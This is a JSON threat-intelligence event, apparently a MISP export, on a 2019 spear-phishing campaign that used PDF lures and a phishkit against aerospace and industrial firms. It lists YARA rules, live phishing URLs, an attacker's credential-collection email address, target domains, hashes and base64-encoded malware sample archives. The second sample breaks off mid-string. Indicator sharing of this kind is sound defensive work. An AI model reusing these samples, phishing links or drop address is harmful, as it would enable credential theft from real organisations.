1823 lines
6.8 MiB
JSON
1823 lines
6.8 MiB
JSON
|
{
|
||
|
"Event": {
|
||
|
"analysis": "1",
|
||
|
"date": "2019-05-16",
|
||
|
"extends_uuid": "",
|
||
|
"info": "Targeted phishing - PDF documents / phishkit",
|
||
|
"publish_timestamp": "1622024256",
|
||
|
"published": true,
|
||
|
"threat_level_id": "3",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd3938-7134-4908-9552-173cc0a8016e",
|
||
|
"Orgc": {
|
||
|
"name": "EUROLEA",
|
||
|
"uuid": "5cdc2cdd-bca4-4a76-8955-03cdc0a8016e"
|
||
|
},
|
||
|
"Tag": [
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:mitre-attack-pattern=\"Spearphishing Link - T1192\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#3bb800",
|
||
|
"name": "enisa:nefarious-activity-abuse=\"spear-phishing-attacks\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#004646",
|
||
|
"name": "type:OSINT"
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0071c3",
|
||
|
"name": "osint:lifetime=\"perpetual\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0087e8",
|
||
|
"name": "osint:certainty=\"50\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#33FF00",
|
||
|
"name": "tlp:green"
|
||
|
},
|
||
|
{
|
||
|
"colour": "#ffffff",
|
||
|
"name": "tlp:white"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558002233",
|
||
|
"to_ids": false,
|
||
|
"type": "yara",
|
||
|
"uuid": "5cdd3a39-84f0-4179-b3ea-173cc0a8016e",
|
||
|
"value": "rule PDF_LIFT {\r\nstrings:\r\n\t$a = \"Rect[ 195.05 428.59 411.79 489.67]\"\r\ncondition:\r\n\tall of them\r\n}"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Generic yara rule to find the common JAT author.",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012404",
|
||
|
"to_ids": true,
|
||
|
"type": "yara",
|
||
|
"uuid": "5cdd3a5b-3448-49d1-b35e-12a4c0a8016e",
|
||
|
"value": "rule PDF_JAT_AUTHOR {\r\nstrings:\r\n$a = \"<</Author(JAT)\"\r\ncondition:\r\nall of them\r\n}"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Email used to send credentials (found in the sendmail.php file)",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010661",
|
||
|
"to_ids": true,
|
||
|
"type": "email-dst",
|
||
|
"uuid": "5cdd5b25-5624-4404-b507-c170950d210f",
|
||
|
"value": "jatboss6@gmail.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010725",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5b65-9f28-4c2f-944e-444b950d210f",
|
||
|
"value": "https://lulufabllc.com/doc/cdnrg.com/index.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010725",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5b65-dcb0-49b0-bf70-4129950d210f",
|
||
|
"value": "https://helpersserer.com/wp-inc/Response/www.tenova.com/index.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010725",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5b65-5d90-4cdf-ab91-4355950d210f",
|
||
|
"value": "https://www.arbutusroutes.com/document/standardaero.com/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010725",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5b65-0804-4636-bffe-491e950d210f",
|
||
|
"value": "https://www.arbutusroutes.com/document/utc.com/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558010725",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5b65-b1f0-4e0f-bf15-4c53950d210f",
|
||
|
"value": "https://www.arbutusroutes.com/document/gd.com/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558011379",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd5dcf-4a6c-4843-94b3-4d49950d210f",
|
||
|
"value": "https://www.arbutusroutes.com/document/airbus.com/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-0e48-4b97-bb9e-43ff950d210f",
|
||
|
"value": "airbus.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-b678-4fae-bd00-4390950d210f",
|
||
|
"value": "tenova.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-29ec-42c0-936b-4d9d950d210f",
|
||
|
"value": "standardaero.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-713c-4eb6-adf5-4f3e950d210f",
|
||
|
"value": "gd.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-ab44-4ab7-be4b-4aa1950d210f",
|
||
|
"value": "utc.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558012892",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd63dc-0b30-404e-a1c4-4479950d210f",
|
||
|
"value": "cdnrg.com"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Older phishing link where the login page was mirror in Wed, 12 Sep 2018 06:29:39 GMT",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558013248",
|
||
|
"to_ids": false,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd6540-3188-4be6-8664-4555950d210f",
|
||
|
"value": "http://office.online-drive.ml/push-doc/cproduct_brochure_fg.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558013658",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd66da-91e4-49bb-a834-409b950d210f",
|
||
|
"value": "https://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "Phishing links",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558013991",
|
||
|
"to_ids": false,
|
||
|
"type": "url",
|
||
|
"uuid": "5cdd6827-982c-43af-9aa9-4212950d210f",
|
||
|
"value": "https://arbutusroutes.com/ssl/akhurst.com/index.php"
|
||
|
},
|
||
|
{
|
||
|
"category": "Targeting data",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1558014011",
|
||
|
"to_ids": false,
|
||
|
"type": "target-org",
|
||
|
"uuid": "5cdd683b-6530-4b0d-a8de-40c1950d210f",
|
||
|
"value": "akhurst.com"
|
||
|
}
|
||
|
],
|
||
|
"Object": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558013350",
|
||
|
"uuid": "97bd5034-12a0-4c06-a779-de38deac6059",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "97bd5034-12a0-4c06-a779-de38deac6059",
|
||
|
"referenced_uuid": "76f9b382-c58e-46f8-b174-42275f764d3e",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a8-2960-49f9-b4b8-4316950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "5b241faa-dc1a-4c3c-884f-feddd4e660d7",
|
||
|
"value": "28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "ecc46363-2c17-4cc9-9cb2-ede7e6414048",
|
||
|
"value": "293456"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "entropy",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": false,
|
||
|
"type": "float",
|
||
|
"uuid": "8930e85f-68ff-4ad2-90ae-bed8577cb4c9",
|
||
|
"value": "7.9916395623958"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "0cd8fb23-ca95-492d-bb4e-cdab5a44c5ce",
|
||
|
"value": "9a58b7f8ba04c32c027126379456e444"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "dd9786d6-2f7c-476f-a6f2-c4d2933b9dcd",
|
||
|
"value": "b49d7b503f9e1cd1a22a4933fb1f1a1e0b56f214"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558002045",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "daa2508f-f5ca-4528-8565-7f950dbd2690",
|
||
|
"value": "28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha512",
|
||
|
"timestamp": "1558002046",
|
||
|
"to_ids": true,
|
||
|
"type": "sha512",
|
||
|
"uuid": "574eb954-6ca4-40e5-858d-56a1d16d9c7d",
|
||
|
"value": "1717448f733024fcb9ea6d591115fb852fd59179c071939a3b1fe8ffb93985925646fb813a2d5828613d0c4494f1ffa3a04182569154fe42fbea1d9e9f5fd27f"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1558002046",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "518d0da6-dddf-443c-bea5-193dd524d2d3",
|
||
|
"value": "28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02|9a58b7f8ba04c32c027126379456e444"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "mimetype",
|
||
|
"timestamp": "1558002046",
|
||
|
"to_ids": false,
|
||
|
"type": "mime-type",
|
||
|
"uuid": "b96aeb28-6672-41a0-a347-7ab32ce9a4f1",
|
||
|
"value": "PDF document, version 1.5"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ssdeep",
|
||
|
"timestamp": "1558002046",
|
||
|
"to_ids": true,
|
||
|
"type": "ssdeep",
|
||
|
"uuid": "1ec7e2a2-0b54-4352-ae04-1cbbc3bf5470",
|
||
|
"value": "6144:NsxJx6kEIUqWBT/jUcoXxC24MgppaAa2XFVzCCr1OHNw+4je6iMllP:Nsx/M3TLxer4M2sAa2VVpr1OH9Oe6HlJ"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1558013350",
|
||
|
"uuid": "3a4f2299-8136-45ec-8927-223b672e4b88",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "3a4f2299-8136-45ec-8927-223b672e4b88",
|
||
|
"referenced_uuid": "dcd9ca51-3194-44ee-86a2-5f0cf9b923f8",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1621850122",
|
||
|
"uuid": "5cdd65a8-f358-4be1-b8be-4159950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "filename",
|
||
|
"uuid": "f321a32c-70b0-4300-8fe8-89b02058b187",
|
||
|
"value": "56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "d33717e1-a1fd-4f1f-abf0-81dd122cf7ef",
|
||
|
"value": "283714"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "entropy",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": false,
|
||
|
"type": "float",
|
||
|
"uuid": "0bee4ae2-3047-4cf1-87b2-25ea78a77c53",
|
||
|
"value": "7.9880939695683"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "4db6a162-7ac7-4093-9667-fd496af7e10f",
|
||
|
"value": "164db8d1fe5f2ea9dd3ea826b2f0b808"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "cb526992-0b24-4b7b-8255-db30b3ab5d26",
|
||
|
"value": "890efaa698f4d43aad15c3dbacb6c01544fd3e27"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "a145796b-37de-4d77-9427-61ded2c5dbaf",
|
||
|
"value": "56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha512",
|
||
|
"timestamp": "1558002047",
|
||
|
"to_ids": true,
|
||
|
"type": "sha512",
|
||
|
"uuid": "e9769aca-b300-4331-85bf-34921987bc2b",
|
||
|
"value": "27c965d92b452d564917e5101cdd3c254347bf919c84be76b666335425e6673cb4a2553421b13841aaeafbf9a9e25ef37369b3d2a5bee208b4259da9053c1bb3"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "UEsDBBQACQAIAJhisE6i+JEACSIEAEJUBAAgABwAMTY0ZGI4ZDFmZTVmMmVhOWRkM2VhODI2YjJmMGI4MDhVVAkAA3853Vx/Od1cdXgLAAEEIQAAAAQhAAAAxe9FePXH5boas9owQ9obCHhQk2MO28rWMp+XpuePF9Mn5sToY3/Db3/nXOuJUc0FaixGkllCWqkDie22QBPMnYu4vHiEfbl+HrNoVYbCr/qCN8PTTaM5s5oTnxHLiIpKuaxXe+FaMZhlGCreG4P+SNmBac86g27VXIFADJOSfE0WxdRlW1vB3ypx6lrbAHPg9KXVxGBavW3UeNrrHUx1aCTV0vQjqb/Dj6Jzc6BiRIzSTEd0Jt1nCRlPRXMG2pZdQuJGXGLCTulwuBFUXEeFPARlXDNbRRKlsMEdbi08Xv++u6lHN9vltf2z9qId/mZxbHi6gNJV4T0eEbfZw6CAyIzIayg3DPYMgg8Z1VuKJHtVe0VBZYTLtBta2bprx7r24yyUZCpDWNFjOsMxd8AH7OeY5Rv48skNuZbPKkyeWP/p2Ud8v93N4HqNc7cdKVWtGPPPOtWlStPHU93xzyd9uJgFxVCWc/4YS5qfpstvmgDtgtIoJ8c0DXt+RXow3ac6x5m4OB40ln9t2fNwk2FbLti5JhzVP+TX7rygyDffgcKidk4Bu5cN1l4+nQlXDpWKoBC/L1Xy0AFCgR6e5KVcRlnaaJtfJH7y+68Yeb9c4SuU2pZYDmlC3LFaXGGs8WnhujrPhTe5a7Ej/BZeQdIdudF4kz403rP/+TiuziFSGONcZqaOqqeMbb5UuFPikShzv3GcMmIgF9/m1h9QBpKW9JY+W6aDkPJU1MyUvVyh5W9L1I7QVzjW1VR6ymGKkfgT0lvMTWof82ziU6yAVzF5sgeBUCqs43zUQuWAz/oE9N84sr+bSts1rC2Rr+5ytjw97lC3ggg6hddPG3LMDxLoUs7OIJwb2RtXeZWKU+XEV7lHHNSOfBBy7i/ZB15QIMlltHusOFTH9kgogGuxPAkB2hrxYflfzTK+kiO0APj7GHCWX0peypx1J/12Ntuzo1r69ZTKUYy73saWFY/iQJEhA6Ojo55+OYazkJXOmcvrEwNWM5rRIu3UCP09gyXNI6j2Ih5j+/j2RDm8kh2huUmI8cI9G4n86nxUWRSotbd/nBDhV5AFkyqZFgo8vW+8Z1PjZCiIOELKJDlcw8u6i8KDZz1ZMkGbgZ/QAQ7NTq7TdqMTprVTy78X0vtzPtxcJ01nwbKizqQBmpAPqFyOkaVV4ZsZDs0zQNtdON1V60KLtGBgsCZ+j5O6N7OQzubhsJNXm3CggoEyHYAfumIfPBXRVdNBjrUeawDoSGc/sqM06rqQX8aA6G7IRvV9bDklfLsElLy0oQP5quN3AlcVoYcqZzwu6m60QGvwXkHSG7C/JxVJT3Lw3v2AupVEv+68nDEsAb+SeFIjACWQoBYUpY4bGL23blSwQ9gIa7Bt/RL2A75DLJdmYOxdVQpWMM1iv